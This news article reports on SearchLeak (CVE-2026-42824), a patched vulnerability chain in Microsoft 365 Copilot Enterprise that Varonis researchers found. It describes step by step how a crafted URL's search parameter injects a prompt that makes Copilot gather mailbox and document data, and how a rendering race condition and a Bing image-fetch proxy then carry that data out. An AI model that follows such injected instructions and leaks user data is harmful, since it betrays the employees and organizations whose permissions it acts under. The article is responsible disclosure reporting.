A newly disclosed SearchLeak vulnerability in Microsoft 365 Copilot Enterprise exposed a critical pathway for attackers to steal sensitive organizational data through a specially crafted URL. The flaw chain, now tracked as CVE-2026-42824, was patched by Microsoft earlier this month and assigned a critical severity rating due to its potential impact.

Security researchers at Varonis discovered the issue by combining three separate weaknesses that, on their own, posed limited risk. Together, however, they enabled attackers to silently extract emails, calendar information, SharePoint documents, OneDrive files, and other indexed enterprise content accessible through Microsoft 365 Copilot Enterprise.

How the SearchLeak Vulnerability Worked 

According to the researchers, the SearchLeak vulnerability combined an AI-specific flaw known as Parameter-to-Prompt Injection (P2P) with two traditional web security issues: an HTML rendering race condition and a server-side request forgery (SSRF) vulnerability involving Bing. 

The first stage exploited the search function of Microsoft 365 Copilot Enterprise, where the “q” URL parameter was passed directly to Copilot as an executable prompt. Instead of being treated as a simple search query, attacker-controlled input could be interpreted as instructions. 

Researchers demonstrated that a malicious URL could instruct Copilot to search a victim’s mailbox, retrieve email titles or other sensitive content, and embed the extracted data inside an image URL without requiring any user interaction beyond a click. 

Chaining Three Flaws into One Attack 

The second stage relied on an HTML rendering race condition. While Microsoft attempted to neutralize potentially dangerous HTML by wrapping responses inside code blocks, that protection occurred only after Copilot completed generating its response. During the streaming phase, raw HTML, including image tags, could briefly render and trigger outbound requests before sanitization took effect. 

The final component of the SearchLeak vulnerability involved a Content Security Policy bypass through Bing. Since Bing domains were allowlisted, attackers leveraged Bing’s image search endpoint, which performs server-side fetching of image URLs. By embedding stolen data within those URLs, Bing unknowingly acted as a proxy, forwarding the information to attacker-controlled servers. 

As described by Varonis, the attack required no plugins, elevated privileges, additional clicks, or suspicious domains. Victims only needed to open a trusted Microsoft link. 

Potential Impact of CVE-2026-42824 

Because Microsoft 365 Copilot Enterprise operates with the user’s existing permissions, successful exploitation of CVE-2026-42824 effectively granted attackers access to whatever information the targeted employee could access. 

Potentially exposed data included email content, one-time passwords, password reset links, calendar events, meeting notes, attendee information, confidential communications, SharePoint files, OneDrive documents, earnings reports, salary information, acquisition plans, and other sensitive business records. 

The researchers noted that the novelty of the SearchLeak vulnerability lies in how AI-enabled prompt injection made older attack techniques practical in a new environment. Without the P2P flaw, attackers could not inject malicious instructions; without the race condition, the HTML would be neutralized; and without the SSRF weakness, the Content Security Policy would block data exfiltration. 

Microsoft has since remediated the issue under CVE-2026-42824, but researchers say the case highlights how AI systems can introduce new attack paths by connecting previously understood vulnerabilities in unexpected ways.